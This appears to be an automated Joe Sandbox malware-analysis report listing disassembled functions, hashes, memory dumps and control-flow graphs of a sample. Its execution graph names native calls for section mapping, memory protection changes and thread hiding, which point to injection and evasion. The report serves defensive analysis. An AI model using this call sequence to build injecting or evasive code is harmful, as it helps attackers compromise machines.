                                                  • String ID: $%s$@%s
                                                  • API String ID: 2650857296-834177443
                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                  • Instruction ID: 6326f2151b75ba04b735f60c67257c2fb5a23c7fd3c987080ff5d5d182e12b41
                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                  • Instruction Fuzzy Hash: 7D310572B28A4685EE50DFA6F4612E923A0FB54785F400072EE8D87B96DE3CE546C340
                                                  Function 00007FF6CA9F0204 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DialogParamVisibleWindow
                                                  • String ID: GETPASSWORD1
                                                  • API String ID: 3157717868-3292211884
                                                  • Opcode ID: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                  • Instruction ID: 809020f850aa888941f619afed2d9eb2ca75ddefd294c62c935cb63c3037a7a9
                                                  • Opcode Fuzzy Hash: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                  • Instruction Fuzzy Hash: 1B318325A1C7C281EA10CF92F8761B52B60BF55B86F8801B6E9CEC3766DE2CE551C750
                                                  Function 00007FF6CA9FEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID: @
                                                  • API String ID: 3000768030-2766056989
                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                  • Instruction ID: 039704c9c56a762c2b43104af029cf8c46f305369b14d3d79a063c445c9c0fb0
                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                  • Instruction Fuzzy Hash: B0218622E1868241EB748F26A8A51392661EF45776F2803B9E6EFC77D5CE3CD881C301
                                                  Function 00007FF6CA9F4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CA9F1D3E), ref: 00007FF6CA9F40BC
                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CA9F1D3E), ref: 00007FF6CA9F4102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                  • Instruction ID: 87fa61050273065669f42b65a12b32109596a444ec3e71e5c4f310d4314f202d
                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                  • Instruction Fuzzy Hash: B9115832618B8182EB208F15F85026AB7A0FB88B85F184274EECD87769DF3CD552CB04
                                                  Function 00007FF6CA9DEA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA63
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastObjectSingleWait
                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                  • API String ID: 1211598281-2248577382
                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                  • Instruction ID: bb0e0578d490eea53a56fb7351d1488896b3c63f1eae2fc4a910ce18acd22165
                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                  • Instruction Fuzzy Hash: E1E01221E15C4241F5106F61FC6647832107F65776F9043B1D4BFC21E19E2C59468304
                                                  Function 00007FF6CA9DA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FindHandleModuleResource
                                                  • String ID: RTL
                                                  • API String ID: 3537982541-834975271
                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                  • Instruction ID: 715356a4a7ab7265388e4a8bcb963fbdc14ab86a252661cfb9f70aceaa94deda
                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                  • Instruction Fuzzy Hash: 63D017A1F1968682FF195FE5B46937426505F2CB82F4840B8C88A87391EE6C9099C798

                                                  Execution Graph

                                                  Execution Coverage:21.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:92.3%
                                                  Total number of Nodes:39
                                                  Total number of Limit Nodes:0
                                                  execution_graph 19670 23ac138 19671 23ac187 NtOpenFile 19670->19671 19673 23ac20a 19671->19673 19674 23ac3b8 19675 23ac401 NtQuerySystemInformation 19674->19675 19677 23ac46e 19675->19677 19693 23ac270 19694 23ac2bf NtCreateSection 19693->19694 19696 23ac34d 19694->19696 19705 23ac4d0 19706 23ac51c NtMapViewOfSection 19705->19706 19708 23ac5df 19706->19708 19709 23ab750 19710 23ab79f NtProtectVirtualMemory 19709->19710 19712 23ab817 19710->19712 19682 23ac788 19683 23ac7d1 NtDeviceIoControlFile 19682->19683 19685 23ac880 19683->19685 19713 23ab548 19714 23ab58c NtSetInformationThread 19713->19714 19716 23ab5f9 19714->19716 19686 23d7309 19687 23d735d NtSetInformationProcess 19686->19687 19688 23d73c8 19687->19688 19678 23ab420 19679 23ab469 NtQueryInformationProcess 19678->19679 19681 23ab4e1 19679->19681 19689 23abc80 19690 23abccc NtAllocateVirtualMemory 19689->19690 19692 23abd4f 19690->19692 19697 23ab660 19698 23ab6a4 NtClose 19697->19698 19700 23ab6f0 19698->19700 19701 23ac660 19702 23ac6a9 NtQueryVolumeInformationFile 19701->19702 19704 23ac721 19702->19704 19717 23d9940 19718 23d9988 EnumWindows 19717->19718 19720 23d99ed 19718->19720

                                                  Executed Functions

                                                  Function 00CD6301 Relevance: 28.7, Strings: 17, Instructions: 7481COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0Xg$!g-C$)h7:$,9]$-@2 $/W;$6f=h$:3)$:#Q$<D;y$Lei$O3)$ljP$v?b$_c$EA$EA
                                                  • API String ID: 0-1893062264
                                                  • Opcode ID: 42f93cdab0c9b5a31de11a8371b04e2064da90256f1611c16e66ece062e3b457
                                                  • Instruction ID: 749e34d248f580113a14c1901137a93000dac48c4af1445d29e78d7b5478faed
                                                  • Opcode Fuzzy Hash: 42f93cdab0c9b5a31de11a8371b04e2064da90256f1611c16e66ece062e3b457
                                                  • Instruction Fuzzy Hash: 2D04E774E00219AFCB94DFA9C840A9DB7B2EF89304F1081EAD919E7750DB35AE91CF45
                                                  Function 00CDC6E0 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2456 cdc6e0-cdc705 2457 cdc70c-cdc759 2456->2457 2458 cdc707 2456->2458 2459 cdc75b-cdc762 2457->2459 2460 cdc792-cdc7c3 2457->2460 2458->2457 2462 cdc76a-cdc790 2459->2462 2463 cdc82a-cdc83e 2460->2463 2464 cdc7c5-cdc7d1 2460->2464 2462->2460 2465 cdc7d4-cdc7d8 2462->2465 2463->2459 2468 cdc844-cdc861 2463->2468 2464->2465 2466 cdc7f9 2465->2466 2467 cdc7da-cdc7e3 2465->2467 2469 cdc7fc-cdc80b 2466->2469 2470 cdc7ea-cdc7ed 2467->2470 2471 cdc7e5-cdc7e8 2467->2471 2474 cdc868-cdc8bc 2468->2474 2469->2462 2473 cdc811-cdc825 2469->2473 2472 cdc7f7 2470->2472 2471->2472 2472->2469 2475 cdc8d8-cdc8e9 2473->2475 2474->2459 2479 cdc8c2-cdc8d6 2474->2479 2476 cdc908 2475->2476 2477 cdc8eb-cdc901 2475->2477 2481 cdc909 2476->2481 2477->2476 2479->2475 2481->2481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 9,7$\;^q$\;^q
                                                  • API String ID: 0-1039145247
                                                  • Opcode ID: fe141be1b49e27e860838114904be48c42ad10645accc9dd5c6f4a2763eb2e1f
                                                  • Instruction ID: 02d1288121924228f702062fa42732ea2f9d95c5b3fffb3f0ad6ca678e0fde1b
                                                  • Opcode Fuzzy Hash: fe141be1b49e27e860838114904be48c42ad10645accc9dd5c6f4a2763eb2e1f
                                                  • Instruction Fuzzy Hash: 4561EF74E002099BDB58CFAAD484ADDBBF2AF88300F14C12AE825B7354DB749946DF64
                                                  Function 02500B18 Relevance: 3.8, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2482 2500b18-2500b3d 2483 2500b44-2500b49 2482->2483 2484 2500b3f 2482->2484 2485 2500b6a 2483->2485 2486 2500b4b-2500b54 2483->2486 2484->2483 2489 2500b6d-2500b74 2485->2489 2487 2500b56-2500b59 2486->2487 2488 2500b5b-2500b5e 2486->2488 2490 2500b68 2487->2490 2488->2490 2491 2500b95 2489->2491 2492 2500b76-2500b7f 2489->2492 2490->2489 2495 2500b98-2500bc9 2491->2495 2493 2500b81-2500b84 2492->2493 2494 2500b86-2500b89 2492->2494 2496 2500b93 2493->2496 2494->2496 2498 2500bd1-2500bda 2495->2498 2496->2495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q$4'^q
                                                  • API String ID: 0-622892151
                                                  • Opcode ID: 726a261bb5add20cf19e147f70e08cbcd3bcfc527c29164bcf6a1b26d75a0186
                                                  • Instruction ID: e34b8bd15f48cbde0d218d55754bc05ca31ca2963bfaa1cf248fc2a7abcb99c4
                                                  • Opcode Fuzzy Hash: 726a261bb5add20cf19e147f70e08cbcd3bcfc527c29164bcf6a1b26d75a0186
                                                  • Instruction Fuzzy Hash: 7421F374E0020EDFCF08CF98D984AEEBBB2BB49314F104469E5007B290DB359E44CBA9
                                                  Function 023D6D68 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 253COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2519 23d6d68-23d6d7a 2521 23d6d9d-23d6da8 2519->2521 2522 23d6d7c-23d6d82 2519->2522 2523 23d6dab-23d6dd9 2522->2523 2524 23d6d84-23d6d9a 2522->2524 2526 23d6e5c-23d6e65 2523->2526 2527 23d6ddf-23d6e02 2523->2527 2529 23d6e04-23d6e0a 2527->2529 2530 23d6e66-23d6e70 2527->2530 2529->2526 2531 23d6e0c 2529->2531 2534 23d6ed9 2530->2534 2535 23d6e72-23d6e7d 2530->2535 2533 23d6e0f-23d6e12 2531->2533 2533->2530 2536 23d6e14-23d6e22 2533->2536 2537 23d6eda-23d6ee4 2534->2537 2535->2537 2538 23d6e7f-23d6e95 2535->2538 2539 23d6e24-23d6e3b 2536->2539 2540 23d6e46-23d6e4c 2536->2540 2546 23d6ee5-23d6ef3 2537->2546 2547 23d6f44-23d6f4f 2537->2547 2541 23d6e9c-23d6ec8 call cd9a90 2538->2541 2542 23d6e97 2538->2542 2539->2540 2549 23d6e3d-23d6e45 2539->2549 2540->2530 2543 23d6e4e-23d6e5a 2540->2543 2542->2541 2543->2526 2543->2533 2550 23d7310-23d73c6 NtSetInformationProcess 2546->2550 2547->2550 2555 23d73cf-23d740f 2550->2555 2556 23d73c8-23d73ce 2550->2556 2556->2555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  • Opcode ID: 723cd92c642748673e9e12647bb1eac98a05c4467c6eb330e2b2a99485fed3b3
                                                  • Instruction ID: 997a40c87f331d0c2e7166363aae38c07e53326a0903780b2b538f38c9514fc5
                                                  • Opcode Fuzzy Hash: 723cd92c642748673e9e12647bb1eac98a05c4467c6eb330e2b2a99485fed3b3
                                                  • Instruction Fuzzy Hash: 35918D75D00258DFCB01DFA9E980A9DFBB1FF49310F1485AAE828AB251D730E946CF94
                                                  Function 023D7290 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2561 23d7290-23d7298 2563 23d730a-23d73c6 NtSetInformationProcess 2561->2563 2564 23d729a-23d72a7 2561->2564 2567 23d73cf-23d740f 2563->2567 2568 23d73c8-23d73ce 2563->2568 2564->2563 2568->2567
                                                  APIs
                                                  • NtSetInformationProcess.NTDLL(?,?,?,?), ref: 023D73B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcess
                                                  • String ID: U
                                                  • API String ID: 1801817001-3372436214
                                                  • Opcode ID: 480eabb360ca5f77d2916802f8f33fc8121d59fdfe20483d75cbe2f73f5b6094
                                                  • Instruction ID: f9fa656bf26cc16355a89398a8c409686f32fb4341f5e40612e545627cfcc243
                                                  • Opcode Fuzzy Hash: 480eabb360ca5f77d2916802f8f33fc8121d59fdfe20483d75cbe2f73f5b6094
                                                  • Instruction Fuzzy Hash: 0D4198B9D002589FCB10CFA9D984ADEFBB0FB09310F20906AE814BB314D375A945CFA5
                                                  Function 00CDADD8 Relevance: 3.0, Strings: 2, Instructions: 487COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2572 cdadd8-cdae03 2573 cdae0a-cdae52 2572->2573 2574 cdae05 2572->2574 2575 cdae55-cdae85 call cdacf0 2573->2575 2574->2573 2578 cdae8b-cdaec5 call cd9888 2575->2578 2582 cdaec8-cdaf0c 2578->2582 2582->2575 2585 cdaf12-cdaf34 2582->2585 2587 cdaf37-cdaf64 2585->2587 2587->2575 2589 cdaf6a-cdafac 2587->2589 2592 cdafaf-cdafc6 2589->2592 2592->2582 2593 cdafcc-cdaff1 2592->2593 2594 cdb275-cdb2e9 call cdaa50 2593->2594 2595 cdaff7-cdb000 2593->2595 2599 cdb2ef-cdb307 2594->2599 2600 cdb38e-cdb3a2 2594->2600 2595->2575 2596 cdb006-cdb042 2595->2596 2596->2587 2604 cdb048-cdb065 2596->2604 2602 cdb309-cdb345 2599->2602 2603 cdb35a-cdb361 2599->2603 2600->2578 2605 cdb3a8-cdb3c7 call cdaa50 2600->2605 2607 cdb34c-cdb351 2602->2607 2608 cdb347 2602->2608 2603->2587 2609 cdb367-cdb383 2603->2609 2610 cdb241-cdb268 2604->2610 2605->2575 2615 cdb3cd-cdb433 call cd11b8 call cd9a90 2605->2615 2607->2600 2612 cdb353 2607->2612 2608->2607 2609->2600 2613 cdb26e 2610->2613 2614 cdb06a-cdb0a2 call cdacf0 2610->2614 2612->2603 2613->2594 2614->2575 2620 cdb0a8-cdb0d2 2614->2620 2632 cdb438-cdb454 2615->2632 2625 cdb105-cdb1cb call cdaa50 2620->2625 2626 cdb0d4-cdb0fe 2620->2626 2655 cdb1ce call cdddcc 2625->2655 2656 cdb1ce call 23a6048 2625->2656 2657 cdb1ce call 23a6039 2625->2657 2658 cdb1ce call cddde8 2625->2658 2626->2625 2632->2592 2634 cdb45a-cdb497 2632->2634 2637 cdb49d-cdb49e 2634->2637 2638 cdb599-cdb5d2 2634->2638 2637->2638 2641 cdb5d8-cdb609 2638->2641 2642 cdb4a3-cdb4fa 2638->2642 2639 cdb1d1-cdb1f9 2639->2575 2645 cdb1ff-cdb23a 2639->2645 2649 cdb60a 2641->2649 2642->2637 2648 cdb4fc-cdb569 2642->2648 2645->2610 2652 cdb56b 2648->2652 2653 cdb570-cdb592 2648->2653 2649->2649 2652->2653 2653->2638 2655->2639 2656->2639 2657->2639 2658->2639
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5A5T$XUi
                                                  • API String ID: 0-1829385252
                                                  • Opcode ID: da790dcb481d64ec9a78fbead909ef6dd068f618d9b9dceec93d28d8d2f33e79
                                                  • Instruction ID: 5cdb1b54a0b6d49ac832db9a3cf26b4d47ce1f71ba54374837ef7e32670ad500
                                                  • Opcode Fuzzy Hash: da790dcb481d64ec9a78fbead909ef6dd068f618d9b9dceec93d28d8d2f33e79
                                                  • Instruction Fuzzy Hash: 6332B474E00219DFDB58DFA9D981B9DB7B2BF88300F0081AAE529A7361DB349D85CF50
                                                  Function 00CDADC8 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2659 cdadc8-cdae03 2660 cdae0a-cdae52 2659->2660 2661 cdae05 2659->2661 2662 cdae55-cdae85 call cdacf0 2660->2662 2661->2660 2665 cdae8b-cdaec5 call cd9888 2662->2665 2669 cdaec8-cdaf0c 2665->2669 2669->2662 2672 cdaf12-cdaf34 2669->2672 2674 cdaf37-cdaf64 2672->2674 2674->2662 2676 cdaf6a-cdafac 2674->2676 2679 cdafaf-cdafc6 2676->2679 2679->2669 2680 cdafcc-cdaff1 2679->2680 2681 cdb275-cdb2e9 call cdaa50 2680->2681 2682 cdaff7-cdb000 2680->2682 2686 cdb2ef-cdb307 2681->2686 2687 cdb38e-cdb3a2 2681->2687 2682->2662 2683 cdb006-cdb042 2682->2683 2683->2674 2691 cdb048-cdb065 2683->2691 2689 cdb309-cdb345 2686->2689 2690 cdb35a-cdb361 2686->2690 2687->2665 2692 cdb3a8-cdb3c7 call cdaa50 2687->2692 2694 cdb34c-cdb351 2689->2694 2695 cdb347 2689->2695 2690->2674 2696 cdb367-cdb383 2690->2696 2697 cdb241-cdb268 2691->2697 2692->2662 2702 cdb3cd-cdb433 call cd11b8 call cd9a90 2692->2702 2694->2687 2699 cdb353 2694->2699 2695->2694 2696->2687 2700 cdb26e 2697->2700 2701 cdb06a-cdb0a2 call cdacf0 2697->2701 2699->2690 2700->2681 2701->2662 2707 cdb0a8-cdb0d2 2701->2707 2719 cdb438-cdb454 2702->2719 2712 cdb105-cdb1cb call cdaa50 2707->2712 2713 cdb0d4-cdb0fe 2707->2713 2742 cdb1ce call cdddcc 2712->2742 2743 cdb1ce call 23a6048 2712->2743 2744 cdb1ce call 23a6039 2712->2744 2745 cdb1ce call cddde8 2712->2745 2713->2712 2719->2679 2721 cdb45a-cdb497 2719->2721 2724 cdb49d-cdb49e 2721->2724 2725 cdb599-cdb5d2 2721->2725 2724->2725 2728 cdb5d8-cdb609 2725->2728 2729 cdb4a3-cdb4fa 2725->2729 2726 cdb1d1-cdb1f9 2726->2662 2732 cdb1ff-cdb23a 2726->2732 2736 cdb60a 2728->2736 2729->2724 2735 cdb4fc-cdb569 2729->2735 2732->2697 2739 cdb56b 2735->2739 2740 cdb570-cdb592 2735->2740 2736->2736 2739->2740 2740->2725 2742->2726 2743->2726 2744->2726 2745->2726
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5A5T$XUi
                                                  • API String ID: 0-1829385252
                                                  • Opcode ID: 6a30c3bf7e3e205b78392aadbb278a794e6ebc9b1d5ab4d6281bcd8229751e45
                                                  • Instruction ID: 4110f5ee4cc73865b24da2b487db9811cb897d3f5b7b7f276180f669c4b317d6
                                                  • Opcode Fuzzy Hash: 6a30c3bf7e3e205b78392aadbb278a794e6ebc9b1d5ab4d6281bcd8229751e45
                                                  • Instruction Fuzzy Hash: C3F1C675D00219DFDB58DFAAD981B9DF7B2BF84300F1081AAE529A7361DB349985CF10
                                                  Function 02500B01 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: a^q$4'^q
                                                  • API String ID: 0-3189636481
                                                  • Opcode ID: c564c67c86e60e5e3230b9abf66807bf22b7e1aad84f45a892a4ac08bacff204
                                                  • Instruction ID: b7d40ac579e702bea4a8e6be6a1d9e890f9326dec678dd596aa0634eb8e2b6e2
                                                  • Opcode Fuzzy Hash: c564c67c86e60e5e3230b9abf66807bf22b7e1aad84f45a892a4ac08bacff204
                                                  • Instruction Fuzzy Hash: AF212830D08249DFCF06CFA8D894AEEBFB1BB06304F1044AAD440BB2A1D7345E45CBA9
                                                  Function 02500818 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  • Opcode ID: 407a6e5174316ad0d9295384a7450708571b599d63bf4e66cd5b2cbf15b417be
                                                  • Instruction ID: 58450302c3c668c81d921ff4d315d4cfccdc08acd2a75835d6e58871f9495328
                                                  • Opcode Fuzzy Hash: 407a6e5174316ad0d9295384a7450708571b599d63bf4e66cd5b2cbf15b417be
                                                  • Instruction Fuzzy Hash: 24210A70D0420DEFCB54DFA8D984AAEBBB1BF05310F2094AAD410A7380D7309A80CF98
                                                  Function 00CDEA00 Relevance: 1.8, Strings: 1, Instructions: 558COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :S.c
                                                  • API String ID: 0-261385982
